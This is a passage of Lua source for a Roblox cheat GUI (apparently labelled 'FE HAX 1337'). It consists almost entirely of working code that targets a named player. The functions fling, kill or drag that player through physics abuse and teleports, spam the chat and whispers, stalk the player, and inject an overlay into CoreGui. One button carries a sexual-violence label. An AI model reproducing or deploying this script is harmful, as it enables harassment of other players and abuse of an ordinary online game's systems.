0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Flatten" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character["Left Leg"] y:Fire() track:Play(.1, 1, 1) game:GetService('RunService').Stepped:connect(function() if flattening then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if flattening then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0,2,0) end end end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Flatten:Destroy() track:Stop() Flatten.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) SlowAttracting = false SlowAttract.MouseButton1Click:connect(function() SlowAttracting = not SlowAttracting if SlowAttracting then SlowAttract.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnD = 5000 b.MaxThrust = 5000 b.MaxSpeed = 200 b.ThrustP = 5000 b.CartoonFactor = 1 b.Name = "SlowAttract" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do b.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart b:Fire() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head game:GetService('RunService').Stepped:connect(function() if SlowAttracting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SlowAttract:Destroy() SlowAttract.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) AimHeading = false AimHead.MouseButton1Click:connect(function() AimHeading = not AimHeading if AimHeading then AimHead.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnP = 2500 b.MaxThrust = 50000 b.MaxSpeed = 1000 b.ThrustP = 50000 b.CartoonFactor = 1 b.Name = "AimHead" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head b.Target = game:GetService("Players")[v.Name].Character.Head b:Fire() game:GetService('RunService').Stepped:connect(function() if AimHeading then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.AimHead:Destroy() AimHead.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) Multipleing = false Multiple.MouseButton1Click:connect(function() Multipleing = not Multipleing if Multipleing then Multiple.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local t1 = Instance.new("RocketPropulsion") t1.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t1.TurnP = 30000 t1.MaxThrust = 30000 t1.MaxSpeed = 1000 t1.ThrustP = 30000 t1.CartoonFactor = 1 t1.Name = "one" local t2 = Instance.new("RocketPropulsion") t2.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t2.TurnP = 30000 t2.MaxThrust = 30000 t2.MaxSpeed = 1000 t2.ThrustP = 30000 t2.CartoonFactor = 1 t2.Name = "two" local t3 = Instance.new("RocketPropulsion") t3.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t3.TurnP = 30000 t3.MaxThrust = 30000 t3.MaxSpeed = 1000 t3.ThrustP = 30000 t3.CartoonFactor = 1 t3.Name = "three" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do t1.Target = game:GetService("Players")[v.Name].Character.Torso t1:Fire() t2.Target = game:GetService("Players")[v.Name].Character["Right Leg"] t2:Fire() t3.Target = game:GetService("Players")[v.Name].Character["Left Arm"] t3:Fire() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head game:GetService('RunService').Stepped:connect(function() if Multipleing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.one:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.two:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.three:Destroy() Multiple.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) Violenting = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Violenting = false Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Violent.MouseButton1Click:connect(function() Violenting = not Violenting if Violenting then Violent.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Violent" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart y:Fire() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head track:Play(.1, 1, 10) game:GetService('RunService').Stepped:connect(function() if Violenting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Violent:Destroy() track:Stop() Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) Violenting = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Violenting = false Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Violent.MouseButton1Click:connect(function() Violenting = not Violenting if Violenting then Violent.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 500000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Violent" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart y:Fire() track:Play(.1, 1, 10) game:GetService('RunService').Stepped:connect(function() if Violenting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Violent:Destroy() track:Stop() Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) WeirdOrbital = false WeirdOrbit.MouseButton1Click:connect(function() WeirdOrbital = not WeirdOrbital if WeirdOrbital then WeirdOrbit.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.TurnD = 50000 o.Name = "WeirdOrbit" for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart o:Fire() game:GetService('RunService').Stepped:connect(function() if WeirdOrbital then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.WeirdOrbit:Destroy() WeirdOrbit.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) Maxing = false Max.MouseButton1Click:connect(function() Maxing = not Maxing if Maxing then Max.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local t1 = Instance.new("RocketPropulsion") t1.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t1.TurnP = 100000 t1.MaxThrust = 100000 t1.MaxSpeed = 5000 t1.ThrustP = 100000 t1.CartoonFactor = 1 t1.Name = "onee" local t2 = Instance.new("RocketPropulsion") t2.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t2.TurnP = 100000 t2.MaxThrust = 100000 t2.MaxSpeed = 5000 t2.ThrustP = 100000 t2.CartoonFactor = 1 t2.Name = "twoo" local t3 = Instance.new("RocketPropulsion") t3.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t3.TurnP = 100000 t3.MaxThrust = 100000 t3.MaxSpeed = 5000 t3.ThrustP = 100000 t3.CartoonFactor = 1 t3.Name = "threee" local t4 = Instance.new("RocketPropulsion") t4.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t4.TurnP = 100000 t4.MaxThrust = 100000 t4.MaxSpeed = 5000 t4.ThrustP = 100000 t4.CartoonFactor = 1 t4.Name = "fourr" local t5 = Instance.new("RocketPropulsion") t5.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t5.TurnP = 100000 t5.MaxThrust = 100000 t5.MaxSpeed = 5000 t5.ThrustP = 100000 t5.CartoonFactor = 1 t5.Name = "fivee" local t6 = Instance.new("RocketPropulsion") t6.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t6.TurnP = 100000 t6.MaxThrust = 100000 t6.MaxSpeed = 5000 t6.ThrustP = 100000 t6.CartoonFactor = 1 t6.Name = "sixx" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head t1.Target = game:GetService("Players")[v.Name].Character.Torso t1:Fire() t2.Target = game:GetService("Players")[v.Name].Character["Right Leg"] t2:Fire() t3.Target = game:GetService("Players")[v.Name].Character["Left Arm"] t3:Fire() t4.Target = game:GetService("Players")[v.Name].Character["Left Leg"] t4:Fire() t5.Target = game:GetService("Players")[v.Name].Character["Right Arm"] t5:Fire() t6.Target = game:GetService("Players")[v.Name].Character.Head t6:Fire() game:GetService('RunService').Stepped:connect(function() if Maxing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.onee:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.twoo:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.threee:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.fourr:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.fivee:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.sixx:Destroy() Max.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) Animateding = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Animateding = false Animated.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Animated.MouseButton1Click:connect(function() Animateding = not Animateding if Animateding then Animated.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 200000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Animated" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart y:Fire() track:Play(.1, 1, 10) game:GetService('RunService').Stepped:connect(function() if Animateding then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Animated:Destroy() track:Stop() Animated.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) Attach.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame end end) superspinning = false SuperSpin.MouseButton1Click:connect(function() superspinning = not superspinning if superspinning then SuperSpin.BackgroundColor3 = Color3.new(0.905882, 0.498039, 0.435294) for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame wait(1) while wait() do if superspinning then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end end else SuperSpin.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) end end) Kill.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.4) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(100000, 0, 100000)) end end) SafeKill.MouseButton1Click:connect(function() local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end local function tp(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1:MoveTo(char2.Head.Position) end end for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do wait(0.1) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-100000,0,-100000)) wait(0.7) tp(game:GetService("Players").LocalPlayer,game:GetService("Players")[v.Name]) wait(0.7) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW end end) Bring.MouseButton1Click:connect(function() local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end local function tp(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1.HumanoidRootPart.CFrame = char2.HumanoidRootPart.CFrame end end local function getout(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1:MoveTo(char2.Head.Position) end end for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do tp(game:GetService("Players")[v.Name], game:GetService("Players").LocalPlayer) wait(0.2) tp(game:GetService("Players")[v.Name], game:GetService("Players").LocalPlayer) wait(0.5) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait(0.5) getout(game:GetService("Players").LocalPlayer, game:GetService("Players")[v.Name]) wait(0.3) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW end end) FreeFall.MouseButton1Click:connect(function() local NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end for i,v in pairs(GetPlayer(TXTBOX_PlrNameOTHER3.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait(0.6) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,50000,0) end end) while wait() do if SpammingChar then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(TXTBOX_Chat.Text, "All") Spam_2.BackgroundColor3 = Color3.new(0.280392, 0.9, 0.543137) wait(0.5) else Spam_2.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) end if annoying then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame Annoy.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else Annoy.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if Carpett then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame Carpet.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if following then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(5,0,0) Follow.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else Follow.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if headwalking then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.Head.CFrame HeadWalk.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) end else HeadWalk.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if Spammer then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("/w "..v.Name.." @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", "All") Spam.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) wait(0.5) end else Spam.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end if watching then for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do CreepyWatch.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game:GetService("Players").LocalPlayer.Character.Torso.Position, game:GetService("Players")[v.Name].Character.Torso.Position) end else CreepyWatch.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end end end) fehax1337.Name = "fehax1337" fehax1337.Parent = Main fehax1337.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) fehax1337.Position = UDim2.new(0.63564837, 0, 0.69655937, 0) fehax1337.Size = UDim2.new(0, 150, 0, 21) fehax1337.Font = Enum.Font.SourceSans fehax1337.Text = "FE HAX 1337" fehax1337.TextColor3 = Color3.new(0, 0, 0) fehax1337.TextSize = 28 fehax1337.MouseButton1Down:connect(function() -- Objects local FeHax1337 = Instance.new("ScreenGui") local Base = Instance.new("Frame") local Annoy = Instance.new("TextButton") local Hatspin = Instance.new("TextButton") local Creeper = Instance.new("TextButton") local Username = Instance.new("TextBox") local Naked = Instance.new("TextButton") local Rape = Instance.new("TextButton") local DropHats = Instance.new("TextButton") local GameRuiner = Instance.new("TextButton") local Fly = Instance.new("TextButton") local Noclip = Instance.new("TextButton") local GUILine = Instance.new("Frame") local no = Instance.new("Frame") local FE = Instance.new("TextLabel") local GUILine_2 = Instance.new("Frame") local no_2 = Instance.new("Frame") local Creditz = Instance.new("TextLabel") -- Properties FeHax1337.Name = "FeHax1337" FeHax1337.Parent = game:GetService("CoreGui") Base.Name = "Base" Base.Parent = FeHax1337 Base.Active = true Base.BackgroundColor3 = Color3.new(1, 1, 1) Base.BorderSizePixel = 0 Base.Draggable = true Base.Position = UDim2.new(0.314787179, 0, 0.224938855, 0) Base.Selectable = true Base.Size = UDim2.new(0, 496, 0, 449) Annoy.Name = "Annoy" Annoy.Parent = Base Annoy.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Annoy.BorderSizePixel = 0 Annoy.Position = UDim2.new(0.362454742, 0, 0.374793768, 0) Annoy.Size = UDim2.new(0, 144, 0, 50) Annoy.Font = Enum.Font.Highway Annoy.Text = "Annoy" Annoy.TextColor3 = Color3.new(0, 0, 0) Annoy.TextSize = 25 Annoy.MouseButton1Down:connect(function() local Victim = Username.Text local P=game:GetService'Players'.LocalPlayer local C=P.Character or P.CharacterAdded:Wait() game:GetService'RunService'.Stepped:Connect(function() C:WaitForChild'HumanoidRootPart'.CFrame=CFrame.new(game:GetService'Players':FindFirstChild(Victim).Character:WaitForChild'HumanoidRootPart'.Position) end) end) Hatspin.Name = "Hatspin" Hatspin.Parent = Base Hatspin.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Hatspin.BorderSizePixel = 0 Hatspin.Position = UDim2.new(0.0277176313, 0, 0.374793768, 0) Hatspin.Size = UDim2.new(0, 144, 0, 50) Hatspin.Font = Enum.Font.Highway Hatspin.Text = "Hatspin" Hatspin.TextColor3 = Color3.new(0, 0, 0) Hatspin.TextSize = 25 Hatspin.MouseButton1Down:connect(function() local obese = game:GetService('Players') for i,v in pairs(obese.LocalPlayer.Character:GetChildren()) do if v.ClassName == "Accessory" then local stg = v.Handle:FindFirstChildOfClass("BodyForce") if stg == nil then local a = Instance.new("BodyPosition") local b = Instance.new("BodyAngularVelocity") a.Parent = v.Handle b.Parent = v.Handle v.Handle.AccessoryWeld:Destroy() b.AngularVelocity = Vector3.new(0,100,0) b.MaxTorque = Vector3.new(0,200,0) a.P = 30000 a.D = 50 game:GetService('RunService').Stepped:connect(function() a.Position = obese.LocalPlayer.Character.Head.Position end) end end end end) Creeper.Name = "Creeper" Creeper.Parent = Base Creeper.BackgroundColor3 = Color3.new(0.0588235, 0.513726, 0.164706) Creeper.BorderSizePixel = 0 Creeper.Position = UDim2.new(0.691692233, 0, 0.374793768, 0) Creeper.Size = UDim2.new(0, 144, 0, 50) Creeper.Font = Enum.Font.Highway Creeper.Text = "Creeper" Creeper.TextColor3 = Color3.new(0, 0, 0) Creeper.TextSize = 25 Creeper.MouseButton1Down:connect(function() local plr = game:GetService("Players").LocalPlayer.Character.Humanoid if plr.RigType == R15 then game:GetService("Players").LocalPlayer.Character.Head.Mesh:Destroy() 